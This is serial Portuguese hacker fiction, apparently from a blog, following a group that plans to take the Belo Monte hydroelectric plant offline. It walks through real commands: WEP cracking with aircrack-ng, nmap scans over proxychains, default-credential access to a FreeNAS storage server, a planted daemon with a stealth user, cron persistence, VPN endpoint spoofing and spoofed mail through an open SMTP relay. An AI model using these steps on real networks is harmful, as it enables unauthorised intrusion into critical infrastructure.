Utilizando o Aircrack, Case tenta quebrar a chave WEP, e que após um pequeno tempo a senha aparece em sua tela. Quando você tentar quebrar a senha de uma rede sem fio saiba que o aplicativo que tentará fazer isso precisará ter uma boa quantidade de dados capturados armazenados, pois assim terá “material” para trabalhar e assim conseguir quebrar a segurança da chave WEP.

Agora consegue se conectar normalmente na rede sem fio utilizando a senha descoberta. Um fato que deixou todos ali surpreendidos é que Case ao inserir a senha, lhe foi atribuído automaticamente um IP de classe C do servidor DHCP da rede (com certeza a rede da Usina deve utilizar outras faixas de IP, pois uma classe C padrão permite utilizar somente cerca de 254 IPs). Conforme o capítulo Melhores Práticas em Segurança de Redes Sem Fio, escrito por Luiz Eduardo dos Santos no livro Trilhas em Segurança da Informação, Editora BRASPORT, 2015, deve haver uma segregação na rede sem fio, ou seja, a criação de VLANs, algo que é comum na rede cabeada. Dessa forma a rede sem fio seria isolada da rede administrativa, TI, e por aí vai. Mas não é o aconteceu após Case se conectar a rede.

O Acesso

Utilizando o script MassAttack (de autoria do nosso amigo Matheus Bernandes) Case faz um scan na rede em busca de servidores com a porta 80 e 8080 abertas:

$ sudo python massattack.py

[+] - Insira a rede: 192.168.0.0/24
[+] - 1 - Tentativa de encontrar fabricante
[+] - Fabricante nao encontrado, salvo em semregistro.txt
[+] - Endereco: 192.168.0.1:80
[+] - 1 - Tentativa de encontrar fabricante
[+] - Fabricante nao encontrado, salvo em semregistro.txt
[+] - Endereco: 192.168.0.100:8080
[+] - 1 - Tentativa de encontrar fabricante
[+] - Fabricante nao encontrado, salvo em semregistro.txt
[+] - Endereco: 192.168.0.150:80
[+] - 1 - Tentativa de encontrar fabricante
[+] - Fabricante nao encontrado, salvo em semregistro.txt

Após o término da varredura:

cd fabricantes

$ ls

semregistro.txt

$ cat semregistro.txt

http://192.168.0.1:80
http://192.168.0.100:8080
http://192.168.0.150:80
http://192.168.0.1:80
http://192.168.0.100:8080
http://192.168.0.150:80

Com base nesse resultado, Case digita a seguinte url em seu navegador:

http://192.168.0.150

E aparece a seguinte tela:

Para quem não sabe o FreeNAS é um storage de rede de baixo custo baseado no FreeBSD, que atua como um tipo de “HD” da rede. Nele você pode configurar o compartilhamento de arquivos, bem como um sistema de alta disponibilidade com RAID. Em uma rede de médio porte e até as de maior, você pode dispensar a necessidade de adquirir hardware dedicado, que é muito mais caro.

– Vamos começar pela senha padrão, ok? Comenta Case.

Username: admin

Password: admin

Então…

Shazam! Estão dentro!

Será que ambos encontraram uma mina de ouro?

– Case, veja quais usuários estão cadastrados no sistema. Diz INEM.

Olha só…

O usuário root, o “Deus” do sistema. Mas são espertos e não vão mexer neste usuário, nem alterar a senha. Através do FreeNAS Case poderá criar um usuário no sistema operacional deste servidor. Um usuário de nome “backup” é criado no sistema. Um usuário que não levantará suspeitas, diferente de outros “Raquers”.

Case cria uma partição de 100MB onde deixará o Daemon hospedado. Como falei antes, este Daemon terá a função de capturar informações relevantes sobre a rede e enviar tudo ao grupo.

Veja a topologia abaixo:

Um resumo básico do que Case fez até aqui:

• Case utiliza o aircrack e outros programas para quebrar a segurança da chave WEP;

• Após a quebra e ingresso à rede wireless, o tablet recebe um IP enviado pelo servidor DHCP. Desde modo ele está dentro da rede;

• Utilizando o script MassAttack, Case faz um scan na rede em busca de IPs que estejam com a porta 80 e 8080 abertas;

• De posse de um IP informado pelo script, o mesmo é digitado no navegador. Case consegue acessar um storage de rede utilizando as credenciais default, cria um usuário e um espaço onde o Daemon ficará hospedado.

• O Daemon é então copiado para o servidor através de uma sessão SSH utilizando o programa SCP. Case roda o nosso Daemon, faz alguns testes utilizando o Nmap para verificar se o serviço está em execução, e agenda a sua execução via crontab.

Obviamente no momento em que o Daemon enviar alguma informação para o grupo, será através de uma conexão criptografada, tanto para a conexão, como para o envio dos “arquivos”.

Falta um último teste à fazer: o da conectividade com o mundo externo.

Ainda dentro da sessão SSH no FreeNAS, case digita ping www.google.com.br e também para o IP 201.201.201.201 (fictício). Este último é o IP de um dos servidores do grupo, localizado além da Deep Web. Por incrível que pareça o teste funcionou! Como pode um storage de backup de uma empresa pública (que mexe com o meu e o seu dinheiro) possuir conectividade com a Internet?

Se lembra que na edição #03 Case verificou que uma empresa terceirizada chamada Corvo Corporation (inativa na Receita Federal) possuía uma VPN (toda cheia de furos) com a Belo Monte? Até agora não sabemos quais as reais intenções desta conexão duvidosa. Case, Marcus e INEM resolvem executar uma pequena ação.

Entrando na sala

A gente sabe como são boa parte dos governos (incluindo o Brasil né?). Querem fazer tudo às pressas para que sua imagem não manche perante outros países. O mesmo acontece com a Belo Monte. Numa simples caminhada nossos amigos viram cabos de rede soltos, pontos de rede à vista, e um compartimento com vidro fumê… Ao se aproximarem dela viram luzes piscando.

– Servidores! Grita Marcus.

– Fala mais alto Marcus. Alerta Case.

Realmente era uma sala contendo vários racks recheados de servidores. Case, Marcus e INEM vestem suas máscaras (não preciso falar de quem né?).

– Precisamos entrar lá. O servidor da Corvo Corporation tem a VPN com algum servidor desta sala bem a nossa frente. Fala INEM.

– Mas como entraremos lá? Pergunta Case.

– Olhe pra cima.

O teto do local onde estavam é do tipo removível, em pequenas partes. Basta empurrar um quadrado e passar para a sala dos servidores ao lado.

– Caraca! A gente consegue passar facilmente. Diz Case. – Marcus, você é o mais alto de nós três. Faz um apoio para que eu possa subir.

Marcus entrelaça as mãos para que Case possa apoiar o pé nelas, enquanto INEM vigia os arredores. Case então alcança um quadrado do teto e o empurra para cima. Dá um pequeno impulso e então consegue subir. Os dois que ficaram embaixo logo percebem uma movimentação ali perto. Se escondem num local onde não possam serem vistos. Logo ficam calmos, pois o que viram os fizeram dar uma risadinha. Duas mulheres se beijando loucamente em um canto, até que chegaram bem perto deles, mesmo assim não foram vistos. O beijo e a pegação duraram uns 5 minutos, até que foram para outro local.

– Esse pessoal hein, não importa o “encontro social” que esteja acontecendo. Sempre acham um jeito de dar uns amassos. Diz Case no meio à risadas.

Nas primeiras edições do DefCon (Encontro anual de Hackers), mulheres e homens praticavam ato sexual nos elevadores do local em troca de segredos “informáticos”. Atualmente a busca por uma adrenalina fazem as pessoas se pegarem em qualquer acontecimento social ou locais públicos. Só para os amantes da boa adrenalina. 🙂

Lá em cima, Case levanta um quadrado do teto ao lado para ver como é o local e ergue sua máscara. — Aparentemente está tudo limpo — Fala pro pessoal.

Viu que o acesso dava justamente atrás de um rack. Case pula para baixo e destranca a fechadura “super sofisticada”, simplesmente virando a maçaneta e abrindo a porta levemente, com um sorriso no canto da boca para os dois amigos. Marcus e INEM entram rapidamente.

O responsável pela segurança física do local deve ter pensado (errado né??) que quem estiver do lado de dentro significa que passou pela porta utilizando um crachá de funcionário. É um clássico caso de Backdoor aplicado ao mundo real.

Os três estão procurando pelo circuito de dados e roteador que está conectado à Corvo Corporation. Uma etiqueta grande com o nome da empresa está bem visível. Um dos cabos ligados ao roteador segue até o servidor da Belo Monte.

Olha só a idéia dos caras:

• Conectar o cabo do roteador em um das interfaces do storage FreeNAS;

• Alterar o endereço mac dessa interface e o endereço IP, para que sejam os mesmos do servidor da Belo Monte;

• A VPN será fechada agora com o storage, este que possui o Daemon em execução;

• Seria um tipo de IP Spoofing, mas do jeito manual, pois tiveram acesso físico ao local.

• Após conectarem o cabo em uma das interfaces do FreeNAS (que antes estava ligado ao server da Belo Monte), ambos tratam de fechar o acesso por onde Case desceu, e saírem pela porta tranquilamente.

Do lado de fora, próximo a um grande palco, centenas de pessoas prestam atenção no pronunciamento da Presidente da República, não se movendo e nem piscando os olhos. Os 3 sentam-se em uma mesa localizada na sombra de uma árvore. Case tira seu tablet do bolso e liga o teclado a ele.

Preparando o terreno

Etapas seguidas pelo Case:

• Entra no terminal e se conecta ao storage através de uma sessão SSH (utilizando o usuário e senha criado(a) anteriormente);

• Configura a interface de rede (na qual está ligado o cabo do roteador da Corvo Corporation) utilizando a mesma configuração de rede e endereço mac do VPN server da Belo Monte;

• Reiniciar o serviço de rede com o comando /etc/init.d/./network restart;

• Testar a conectividade com o servidor da Belo Monte utilizando o comando ping, e pronto! VPN funcionando.

– Vamos nos mandar daqui. Diz Marcus.

O encontro

No caminho até a portaria, o trio tromba com ninguém nada menos que Cypher.

– Ora, ora, mas veja só quem esta por aqui! Se alegra Cypher.

– Espero que tenham conseguido fazer o que vieram fazer e nem me chamaram pra festa?

– Cypher, não conseguimos fazer nada, infelizmente. Mas você vai se dar mal pelo que fez! – Fala Case em voz alta.

– Realmente não me aceitaram no outro grupo, e o que falei para eles não foi praticamente nada. Achei que falando que sabia algo da operação eles poderiam me aceitar, mas não. Tentei plantar verde pra colher maduro, mas em vão. Os caras ainda me espancaram e me largaram em qualquer beco de São Paulo. – Diz Cypher – Pensei em encontrar vocês aqui para poder participar de algo legal, mas já estava indo embora.

– Pois é Cypher, realmente não conseguimos nada, a segurança deles é muito forte. Vamos voltar para São Paulo, e pensar melhor sobre o que faremos.

Voltando pra casa

Case e Marcus se dirigem até o hotel onde estavam hospedados para pegar algumas coisas (INEM e Cipher os acompanham).

Já no aeroporto de Altamira ambos esperam pelo vôo com destino à São Paulo. Case está um pouco pensativo com relação à operação. Cypher teria falado a verdade?

O avião começa a levantar vôo. Os quatro estão juntos na mesma fileira do lado direito do avião. Case olha pela janela e vê um por do sol maravilhoso, em uma linda paisagem.

Um dos pensamentos que pairam na mente de Case é que a “festa” de verdade começará daqui pra frente.

Toquem os tambores!

O que achou do post?

Clique aqui para conferir as outras edições do Diário de um Hacker

Em toda operação existe o risco de que algo dê errado ou que atrapalhe os planos do grupo. Assim como Cypher de Matrix, um de nossos membros foi corrompido por pessoas de outro grupo de hacking. Vamos chamar também ele de Cypher. Essas pessoas “jogaram verde para colher maduro”, pois conhecem Cypher e sabem que ele é um lamer. O indivíduo soltou algumas informações que podem ferrar com tudo (ou não).

E um novo personagem entrará na história para ajudar Case e o grupo. Confira:

Segunda-feira, 9:30 AM

O despertador toca, Case acorda e medita sobre o que terá que fazer hoje. No domingo à noite, Case mandou uma mensagem para o seu chefe do trabalho dando a desculpa que sua mãe não está passando bem e que precisaria ficar com ela o dia todo. Ele aceitou numa boa…

Em seu leitor de e-mail, Case vê que que a Belo Monte respondeu à mensagem enviado anteriormente onde havia solicitado uma visita às dependências da empresa:

CARO RODRIGO,

A BELO MONTE ESTARÁ INAUGURANDO SUAS DEPENDÊNCIAS AMANHÃ NA TERÇA-FEIRA, E TEMOS DUAS VAGAS PARA ESTUDANTES DE ENGENHARIA.

PODERIA ME ENVIAR SEUS DADOS E OS DO SEU COLEGA?

OBRIGADO.

ATENCIOSAMENTE,

PATRÍCIA DE SOUZA

AGENDAMENTO DE VISITAS

“Que boa notícia!”, pensa Case. Os dados a serem enviados não são problema para ele, pois ele já os possui para casos como esse. Documentação “não original” ainda é fácil de conseguir hoje em dia, pois praticamente tudo é possível quando se tem alguns $ a mais. Falando nisso, as atividades realizadas pelo grupo de Case são financiadas por uma entidade anônima, que possui os mesmos interesses.

Case liga para Marcus:

– E aí Marcus, blz?

– Blz Case…

– Seguinte brother, a Belo Monte respondeu ao e-mail, falando que tem duas vagas para nós. Vamos falar com o Cereal (É o líder do grupo, veja na edição #02), pois teremos que pegar um voo até Altamira no Pará, bem como nos hospedarmos em algum lugar.

– Tudo bem Case. O Cereal está no Club neste momento. Vamos lá?

– Tô indo!

10:30 AM

À espera de Case e Marcus, Cereal Killer, afrodescendente, utilizando o seu habitual sobretudo preto, botas de militar, cabelo raspado e óculos escuros, analisa o esquema da rede feito por Case (Edição #03):

“- Os caras são bons hein?”

“- Essa Corvo Corporation escancarou as portas hein…”

Case e Marcus chegam ao Club.

– Olá Cereal! – Diz Case.

– Grande mestre! – Cumprimenta Marcus.

Case prossegue:

– Cereal, conforme te falei pelo Telegram, precisamos pegar um voo hoje à noite para Altamira-Pará. A usina respondeu ao e-mail que enviei, falando da disponibilidade de duas vagas para estudantes de engenharia visitarem as instalações. A inauguração será uma ótima oportunidade para explorarmos alguma falha de segurança, pois as atenções estarão voltadas para a celebração solene da inauguração.

– Case, fique tranquilo. Vocês dois irão para Altamira hoje à noite. Chegando lá, tomem as devidas precauções, ainda mais que agora temos um agravante.

Case e Marcus falam ao mesmo tempo:

– Que agravante??

– Meus caros amigos. Vocês conhecem o Cypher? Devem saber de quem estou falando. Esse lamer fdp foi abordado por duas pessoas daquele grupo mequetrefe que diz ser de hacking. O problema é que o Cypher abriu o bico e acabou soltando alguma coisa para os caras. Não sei o quanto ele falou. Se chegou a falar alguma coisa da nossa operação. Cypher sumiu e não deu as caras, não sei onde está. O que sei é que ele tem o rabo preso por causa daquele ataque de DDoS que executou contra uma conhecida empresa de software. Ela não sabe quem fez o ataque, mas eu e vocês sabemos que né? Se ele falar qualquer coisa de nossa operação, estará com a cabeça à prêmio, aí não sabemos o que pode acontecer com ele.

– Vocês conhecem um hacker de codinome “Inem”? Ele faz parte do grupo ativista LibertyNET, que luta pela liberdade e segurança da informação. Ele criou um script interessante que pode mostrar as coordenadas de quem estiver acessando determinado website. Mantenham contato com ele, pois será de grande ajuda na busca pela localização de Cypher e no que mais precisarmos. O Inem tem uma certa paranoia com relação a segurança da informação, ao “grande irmão”, rs. Ele possui um servidor de IRC, e somente a partir deste é que poderão contatá-lo. Quando “falarem” com ele, digam que o Cereal Killer mandou lembranças. Enviarei à vocês as informações necessárias para falarem com nosso amigo hacker.

– Peguem seus cartões de crédito, e usem a vontade, mas não abusem!

(Risos!)

– OK Cereal, mandaremos notícias! – Responde Case.

08:00 PM – A sétima cavalaria

A noite chega em São Paulo. Em um quarto de hotel com suas paredes descascadas e cheirando a mofo, Inem faz o login em um sistema operacional Linux que está em execução no seu laptop. Podemos dizer que é alguma versão do Fedora.

O hacker é um cara do tipo saudosista, que gostava da Internet em seu estágio inicial, com suas letras verdes sob um fundo preto. Acessou bastante as redes BBSs, e desde esta época utilizou softwares baseados no protocolo IRC. O mIRC, conhecido software de bate papo era o ponto de encontro de hackers e amantes de tecnologia. Hoje essa cultura de união e compartilhamento de informação perdeu um pouco a força, e a comunidade LibertyNET, criada por ele, tenta resgastar essa energia do passado.

Inem sabe que o protocolo IRC é totalmente inseguro, com as informações trafegando em texto puro, podendo ser facilmente capturadas por alguém com “boas” intenções. O cliente IRC que utiliza é o HexChat, disponível para Linux, Mac OS e Windows, além de possuir criptografia RSA de 2048 bits. INEM criou um canal chamado #SystemDown em um servidor de nome freenode.net (Em nossa história este servidor pertence ao Inem e fica hospedado na Suécia, ok?).

Duas pessoas entram na sala: Crazy4Tech (é o codinome de Case, veja no DH #01) e Marcus.

Inem: Boa noite meus amigos!

Crazy4Tech: Blz…

Marcus: E aí…

Crazy4Tech: O Cereal mandou lembranças!

Inem: Esse filho da mãe é demais hein… O que desejam?

Crazy4Tech: O Cereal disse que você possui um script que nos permitirá saber a localização do Cypher. Sabe de quem estou falando não?

Inem: Com certeza sei! É um lamer de primeira, que já me procurou para tentar “invadir” uma conta do Facebook! Quase “dei um tiro” nele, rs. Este script não é nada complicado, somente adaptei ele para que não mostre uma mensagem pedindo autorização do usuário para mostrar a sua localização física. Vou enviar para vocês.

Crazy4Tech: Valeu brother!

Marcus: Será muito útil!

Inem: Então, basicamente o que vocês precisam fazer é adaptar o código em uma página fake, e usar uma engenharia social básica contra o Cypher.

Crazy4Tech: Não será problema! Valeu!

Marcus: Obrigado!

Crazy4Tech e Marcus saem da sala.

09:30 PM

No Aeroporto de Congonhas, São Paulo, a dupla aguarda pela chamada do voo com destino à Altamira.

– Case, o que acha dessa história do Cypher e do Inem?

– Com relação ao Inem, realmente confio no Cereal, pois ele não iria chamar qualquer um pra nos ajudar. E sobre o Cypher, era de se esperar, tava demorando para ele fazer alguma burrada. Fico pensando no quanto o Cypher falou da operação para os caras do outro grupo. Mas por hora, vamos nos preocupar com o nosso objetivo que é entrar nas instalações da usina sem causar suspeitas e explorar as possíveis vulnerabilidades físicas e lógicas, comunicando o Cereal e o restante do grupo com informações do que encontrarmos.

– É isso aí Case! Não vejo a hora de chegar o dia de amanhã!

Assim como Marcus e os outros, Case é um hacker, está no sangue, é algo impossível de descrever. Quando aparece uma oportunidade, não tem como não fazer algo. A curiosidade move Case. Ele olha em volta e vê diversas pessoas utilizando seus smartphones, tablete e laptops. A rede sem fio pública do aeroporto (oferecida por uma empresa terceira) não é segura e possui muitas brechas. Mas Case mira as redes sem fio que são utilizadas pelo pessoal administrativo do aeroporto, onde muitas vezes estão conectadas a sistemas críticos, como bancos de dados, e outros. Ele abre seu notebook, faz o login no sistema, acessa o terminal e digita uma sequência de comandos:

airmon-ng start rausb0: Este comando coloca a placa de rede do laptop em modo monitor.

airodump-ng rausb0: Procura por redes sem fio;

Algumas redes aparecem, e boa parte utilizando a chave WEP, que é uma das piores e mais fracas, sendo fáceis de quebrar. Case identifica que uma das redes listadas pode ser de uso administrativo, com um nome de “adminsec”.

airodump-ng -c 11 – -bssid 00:01:02:03:04:05 -w dump-01.cap rausb0: Este comando irá farejar os pacotes que trafegarem pela rede escolhida. A sequência de números que aparecem após a opção -bssid é o endereço MAC do AP (Access Point) que possui o SSID “adminsec”.

Uma certa quantidade de pacotes é capturada, e Case estará pronto para quebrar a chave WEP.

aircrack-ng -b 00:01:02:03:04:05 dump-01.cap: Comando que serve para quebrar a chave WEP com base nas informações capturadas e armazenadas no arquivo dump-01.cap.

Após algum tempo, a chave utilizada para entrar na rede aparece. Case não faz nada no momento. Isso foi mais para ele aliviar o stress do dia. Mas as informações capturadas ele guardará com carinho, pois quem sabe precisará algum dia.

O número do voo é anunciado nos microfones do aeroporto, Case e Marcus se apressam para embarcar.

Com o avião em pleno voo, Case vê pela janela o céu cheio de estrelas, suas companheiras desta viagem. Marcus apagou mesmo antes do avião decolar.

Case tenta descansar um pouco, pois amanhã será um dia tenso e com muita adrenalina.

Em algum local do avião, uma figura observa os dois.

“- Tenho que falar com eles!”

Continua…

Segunda-feira. Meados de 2014.

O celular desperta às 6 horas manhã ao som da música “Imperial March”. Mais um dia de trabalho vem pela frente. Mais um dia dentro de uma lata de sardinha chamada ônibus, seguido daquele corre-corre de pessoas nas estações de trem e metrô, se empurrando para entrar no vagão do trem. A gente acaba indo pelo rumo, empurrado pela multidão apressada. Quem mora ou morou em São Paulo sabe como é…

Você deve saber, mas atualmente trabalho como garçom em um conhecido restaurante de São Paulo, localizado na região central da cidade. Preciso desse trabalho, já que dificilmente conseguiria um dentro da minha área. Ao puxarem a minha ficha (mesmo que nela não constasse muita coisa) já teriam motivos suficientes para não me contratarem.

“Após algumas reuniões com nosso time interno, resolvemos não seguir com você no processo seletivo. Seu curriculo ficará em nosso banco de dados para futuras vagas. Boa sorte!“

Um pouco de ação

05:25PM

Saio mais cedo do trabalho. Dei aquela desculpa básica de que a avó estava doente e que precisava cuidar dela…

Antes de chegar em casa peguei com o Marcus um equipamentozinho chamado Anonabox. Lembre-se que falo de meados de 2014, então quando estiver lendo esse texto, possivelmente o Anonabox não exista mais ou o seu site esteja fora do ar… De qualquer forma, esse cara nada mais é do que um roteador wireless que pode rotear/encaminhar todo o tráfego da minha Internet para a rede TOR, dando assim uma certa privacidade e anonimato para as atividades de hacking.

Como eu já tinha em casa um roteador padrão (ADSL e wireless), bastou conectar o Anonabox na porta ethernet via cabo RJ-45 CAT 6 do roteador que já tinha em casa.

Sento em frente ao notebook, e como é de praxe, um famoso pinguim aparece na tela de boot para me dar boas-vindas. Apesar de estarmos em um mundo interativo, seja via mouse ou toque na tela, para o hacking prefiro uma tela preta e caracteres verdes e um teclado esperando para ser tocado…

— O que temos para hoje? — Penso em voz alta.

Para adiantar alguma coisa sobre o que o Cereal Killer falou no sábado à noite, em uma simples consulta no Google descobri que uma das empresas que prestou serviços durante a construção da Usina, ainda mantinha uma conexão VPN ativa. Vamos chao mar esta empresa de “Corvo”. Como descobri isso? Veremos adiante.

Garimpando informações

Read more

Sábado, 08:00PM.

O “club”, como é chamado pelos frequentadores da cena underground de tecnologia, fica num local super discreto do centro de São Paulo. Quem passa na frente não imagina o que acontece em seu interior. Existe um porteiro, e qualquer pessoa para entrar, deve fazer a seguinte pergunta a ele: “O que é a Matrix?”, que responderá: “A Matrix está em todo o lugar”. Após essa etapa, o porteiro indicará qual porta a pessoa deverá abrir. É lá dentro onde a “diversão” acontece.

Música eletrônica é o ritmo predominante. Pessoas tomam bebidas no bar, meia dúzia se esbaldam de dançar na pista central, e outras se encontram sentadas em mesas, onde a única luz que se vê é da tela de seus laptops.

Case chega ao club antes do horário marcado, pois gosta de se preparar para a “ação”, trouxe na mochila seu laptop, uma microantena para amplificar o seu sinal de wifi, além de alguns manuais técnicos e um lanche, pois ninguém é de ferro, rsrs.

Marcus chega logo em seguida apressado, carregando uma mochila nas costas, parecendo o Dado (Jonathan Ke Quan), o japonês cientista do filme Goonies.

– E aí Case, como vai?
– Tudo certo Marcus! Só esperando o Cereal aparecer…

Outros colegas apareceram, dentre eles Paulo (Doc. Doom), Joana (Acid Burn), Joe (Orwell) e outros.

Sábado, 08:30PM.

O “club”, como é chamado pelos frequentadores da cena underground de tecnologia, fica num local super discreto do centro de São Paulo. Quem passa na frente não imagina o que acontece em seu interior. Existe um porteiro, e qualquer pessoa para entrar, deve fazer a seguinte pergunta a ele: “O que é a Matrix?”, que responderá: “A Matrix está em todo o lugar”. Após essa etapa, o porteiro indicará qual porta a pessoa deverá abrir. É lá dentro onde a “diversão” acontece.

Cereal Killer (qualquer semelhança com o personagem do filme Hackers, de 1995, não é mera coincidência) é uma pessoa excêntrica e metódica. Ele esperou a Dj tocar a sua música preferida para fazer a entrada triunfal na frente de seus amigos e amigas Hackers.

Ele se dirige até o canto onde estão Case, Marcus e os outros.

– Meus amigos e amigas!
– Como devem saber, a situação em nosso país não está nada bem. Tenho visto que alguns de vocês tem participado de protestos, como o que é contra a corrupção que reside em Brasília e se espalha para o todo o Brasil.
– Mas que não estão atingindo o resultado esperado – disse Case.
– Precisamos de algo que mostre para que viemos, para que nossos governantes e os do mundo inteiro saibam que queremos revolucionar nosso país e trazer de volta aquele Brasil que tanto sonhamos, que realmente preze pela liberdade, que não seja seletiva, se é que me entendem…
Marcos diz: – Obviamente nós não poderemos mudar o Brasil sozinhos, mas, pelo menos, plantaremos uma semente na consciência da galera. Deixaremos uma mensagem.
– Sinto ter que dizer isso, mas às vezes algo de mais enérgico precisa acontecer a fim de que nossos governantes acordem para a realidade que eles ignoram, e é por isso que estamos reunidos aqui hoje – diz Cereal Killer.

Todos ficaram pensativos.

– A Usina Hidrelétrica de Belo Monte é um dos exemplos, bem como o aumento dos impostos e outras coisinhas mais…
– De acordo com informações que obtive, esta usina está fornecendo energia inicialmente para uma central do governo federal que é responsável em vigiar os garimpeiros que coletam ouro em uma determinada área.
– É o governo sendo governo… – Alguém fala.
– Nossa meta é fazer com que a usina fique fora de operação, mesmo que por alguns minutos. Isso será o suficiente para causar um certo barulho. Além disso, colocará em cheque a capacidade do governo em manter a segurança de uma infraestrutura crítica.

Case pensa: “Meus Deus…”

– Pois bem, vocês tem à sua disposição um dos melhores links de Internet, além de contatos em outros estados e até fora do país! Usem a sua inteligência, o que têm de melhor para que possamos atingir o nosso objetivo! Ao trabalho!

Case sabe que a operação está no estágio inicial. Pensa consigo mesmo:

– Bom, tenho que encontrar uma brecha para poder entrar fisicamente nas instalações da Usina. Documentação falsa é mole de conseguir, posso tentar entrar como estudante de curso superior, com o objetivo de fazer uma simples visita na empresa.

Case vai até Marcus e pergunta:

– Marcus, o que acha de fazermos uma visitinha em um certo lugar?
– To dentro!
– Primeiramente Marcus, vamos enviar um fake mail para a usina solicitando o agendamento de uma visita, pois nós seremos simples estudantes que farão uma visita à usina.

CONFORME MENCIONADO NO DIÁRIO DE UM HACKER #01, CASE PRECISA TOMAR AS DEVIDAS PRECAUÇÕES PARA MANTER O SEU ANONIMATO, PARA ISSO ELE SE CONECTA À REDE TOR E UTILIZA O COMANDO PROXYCHAINS SEMPRE ANTES DOS COMANDOS DIGITADOS NO TERMINAL DO LINUX.

No Google digita o seguinte comando (com as aspas):

“Microsoft-IIS/5.0 server at”

Aparecem alguns servidores que (ainda!) rodam uma versão antiga do servidor de internet da Microsoft…

No terminal, Case roda o comando nmap para verificar se ele está executando o serviço SMTP.

crazy4tech@matrix:~$ sudo proxychains nmap -sS 201.200.200.200
[sudo] password for crazy4tech:
ProxyChains-3.1 (http://proxychains.sf.net)

Starting Nmap 6.40 ( http://nmap.org ) at 2015-01-26 02:10 BRST
Nmap scan report for empresa.com.br (201.200.200.200)
Host is up (0.24s latency).
Not shown: 993 closed ports
PORT      STATE    SERVICE
21/tcp    open     ftp
25/tcp    open     smtp
80/tcp    open     http
139/tcp  open     netbios
Nmap done: 1 IP address (1 host up) scanned in 11.10 seconds

Pois bem, vemos que o serviço de SMTP está rodando no mesmo servidor em que está o IIS.

Case agora verifica se o serviço SMTP está aceitando conexões e se ainda consegue mandar um e-mail através dele.

Acompanhe:

crazy4tech@matrix:~$ proxychains telnet 201.200.200.200 25
Trying 201.200.200.200…
Connected to 201.200.200.200.
Escape character is ‘^]’.
220 smtp.empresa.com.br Microsoft ESMTP MAIL Service, Version: 7.5.7601.17514 ready at  Mon, 26 Jan 2015 02:22:21 -0200
helo localhost
250 smtp.empresa.com.br Hello [201.200.200.200]
mail from: aluno@faculdade.com.br
250 2.1.0 aluno@faculdade.com.br….Sender OK
rcpt to: agenda@belomonte.com.br
250 2.1.5 agenda@belomonte.com.br
data
354 Start mail input; end with <CRLF>.<CRLF>
Subject: Agendar visita
Olá, tudo bem?
Sou estudante de engenharia elétrica e gostaria de agendar uma visita. Meu curso pede que eu tenha pelo menos duas horas de visita.
Como está a agenda?
Será eu e mais outro estudante.
Poderia por gentiliza responder para o e-mail crazy4tech@gmail.com, pois este está com problemas para receber.
Obrigado!
.
250 2.6.0 <smtpA69PRiDfZB8b00000001@smtp.empresa.com.br> Queued mail for delivery

A arte do hacking pede paciência para quem a estiver executando, e Case tem de sobra.

Agora só resta esperar.

Case se despede de Marcus e dos demais e vai para casa.

Amanhã (domingo) terá que acordar cedo para trabalhar, no emprego que você já sabe.

Continua…

Provavelmente você deve conhecer esta série por meio do site “O Analista”, que teve seu início lá em meados de 2015. Na verdade, o Canal Hacker é O Analista. Foi apenas uma mudança de nome, tanto que, se você digitar www.oanalista.com.br será direcionado para www.canalhacker.com.br.

Vamos que vamos pessoal!

Diário de um Hacker é uma série de histórias que mostra o Hacker Case nas mais variadas situações. Além do enredo, da história, você também terá acesso à explicação dos comandos digitados por ele e pela turma, bem como os seus resultados. Mas não se preocupe, não é nada de outro mundo. Você caso não seja da área também entender.

Introdução

Case é um pirata dos computadores, um cowboy do ciberespaço (veja “Neuromancer” de William Gibson), um Hacker que utiliza o seu conhecimento para o bem. Mas esse “bem” pode ter diversas interpretações…

Neste mundo dos computadores, é comum as pessoas terem um nickname (apelido), que no caso de Case, é conhecido como “Crazy4Tech” (Louco por tecnologia).

Case trabalha como garçom em um conhecido restaurante, e ninguém imagina como são as suas “atividades extracurriculares”.

Hoje em dia, seja pela mídia ou por uma interpretação equivocada, as pessoas acham que aquele cara que trabalha com computadores é o tipo de pessoa mais indicado para ser “um Hacker”, ou o que “invade a rede das empresas” (Risos!). Saiba que temos pessoas super habilidosas em computadores, redes, Internet ou Segurança da informação, atuando nas mais diversas áreas de trabalho. Outro erro que a maioria comete, é achar que os Hackers são compostos somente por homens. Mulheres são detalhistas, e fazem as coisas com calma, sendo em muitos casos melhores que nós homens.

Vamos voltar a falar sobre nosso amigo Case.

2:30 AM (sexta pra sábado)

Logo após chegar do restaurante, Case joga a roupa em qualquer canto da casa e toma um belo banho frio…

Após o banho, senta em frente ao seu notebook. Uma conhecida logo de um pinguim surge quando liga o equipamento.

Para Case, distribuições Linux são muito boas para a prática de hacking.

Como bom Hacker, você deve sempre presar pelo seu anonimato na web, pois caso o contrário, homens de preto baterão à sua porta… rsrs

Para evitar isso, eis que surge o Projeto Tor, que é uma mão na roda para quem precisa de uma certa privacidade.

Case digita o seu login e senha, e tem acesso à sua área de trabalho.

Dentro do terminal, acessa a pasta do navegador Tor:

crazy4tech@matrix:~$ cd Downloads/tor-browser_pt-PT/

E executa o comando para entrar no navegador:

crazy4tech@matrix:~$ ./start-tor-browser

Uma conexão com a rede Tor é estabelecida e um canal seguro é aberto.

Case estrala os dedos.

Nessas horas de “reconhecimento de terreno”, a companhia de um Hacker é a música. Em sua playlist, nosso amigo seleciona a música Big Bad Wolf da banda In this Moment (Veja no YouTube).

No Google, digita o comando abaixo para buscar por sites/servidores que estejam rodando alguma versão antiga do Apache Web Server do Fedora:

intitle:”Test Page for the Apache HTTP Server on Fedora Core” intext:”Fedora Core Test Page”

Vários servidores aparecem…

Case faz uma escolha aleatória.

De volta ao terminal, case digita o comando abaixo para descobrir o endereço IP deste servidor:

crazy4tech@matrix:~/Downloads/tor-browser_pt-PT$ tor-resolve vnn1.online.fr

O comando tor-resolve é parecido com o comando ping, com a diferença de que não revela informações da localização de quem o estiver utilizando. Se você utilizar o comando ping vnn1.online.fr, enviará junto com a requisição o seu próprio endereço IP, e o log deste servidor também irá registrar essa informação, bem como outras.

O resultado do comando tor-resolve traz o IP 212.27.63.116.

Á partir daqui, saiba que todos os comandos deverão ser digitados com sabedoria, para que como foi citado acima, homens de preto não batam em sua porta às 3 da manhã…

Um aplicativo muito útil neste caso é o proxychains, pois força a utilização da rede Tor para os comandos que são digitados após ele.

Como Case deseja descobrir mais informações sobre o servidor, digita o comando proxychains, e em seguida a sintaxe do comando nmap:

crazy4tech@matrix:~/Downloads/tor-browser_pt-PT$ sudo proxychains nmap -sS 212.27.63.116

[sudo] password for crazy4tech:

ProxyChains-3.1 (http://proxychains.sf.net)

